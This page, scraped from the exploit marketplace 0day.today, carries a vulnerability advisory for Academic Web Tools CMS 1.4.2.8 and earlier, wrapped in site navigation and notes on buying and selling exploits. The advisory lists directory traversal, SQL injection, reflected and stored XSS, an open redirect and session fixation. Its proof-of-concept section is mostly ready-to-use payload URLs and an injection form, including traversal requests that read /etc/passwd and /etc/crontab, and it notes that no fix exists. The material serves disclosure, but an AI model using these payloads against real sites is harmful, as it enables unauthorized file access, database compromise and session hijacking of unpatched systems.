0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
========================================================== Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities ========================================================== # AmnPardaz Security Research Team # # Title: Academic Web Tools CMS Multiple Vulnerabilities # Vendor: www.yektaweb.com # Vulnerable Version: 1.4.2.8 and prior versions # Exploit: Available # Impact: Medium # Fix: N/A ################################################################################### #################### 1. Description: #################### ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too. #################### 2. Vulnerabilities: #################### 2.1. Directory Traversal in "/download.php" in "dfile" parameter. 2.1.1. Exploit: Check the exploit/POC section. 2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter. 2.2.1. Exploit: Check the exploit/POC section. 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters. 2.3.1. Exploit: Check the exploit/POC section. 2.4. Cross Site Scripting (XSS). Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters. 2.3.1. Exploit: Check the exploit/POC section. 2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters. 2.4.1. Exploit: Check the exploit/POC section. 2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service. 2.5.1. Exploit: Check the exploit/POC section. 2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation. 2.5.1. Exploit: Check the exploit/POC section. #################### 3. Exploits/POCs: #################### Original Exploit URL: http://bugreport.ir/index.php?/44/exploit 3.1. Directory Traversal in "/download.php" in "dfile" parameter. ------------- http://[URL]/download.php?dfile=../../../../../../etc/passwd http://[URL]/download.php?dfile=../../../../../../../etc/crontab ------------- 3.2. SQL Injection in "/rating.php" in "book_id" parameter. ------------- <form action="http://[URL]/rating.php" method="post"> <input type=text name=book_id size=100 value="[SQL Injection]"><br> <input type=hidden name=user_score size=100 value=5> <input type=submit name=submit_for_rating value="Go!"> </form> ------------- 3.3. Reflected XSS attack in "/login.php" in URL parameters. ------------- http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script> ------------- 3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters. ------------- http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script> ------------- 3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters. ------------- http://[URL]/rss_getfile.php?file=http://BugReport.ir ------------- 3.6. Reflected XSS attack in "room.php". ------------- First of all, login into the site. Now submit this : <iframe src="http://www.BugReport.ir/" width=1000 height=1000></iframe> at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1 ------------- 3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation. ------------- First, clear the site's cookies, and then goto: http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation ------------- #################### 4. Solution: #################### Source codes are encrypted. Wait for vendor patch. #################### # 0day.today [2024-12-27] #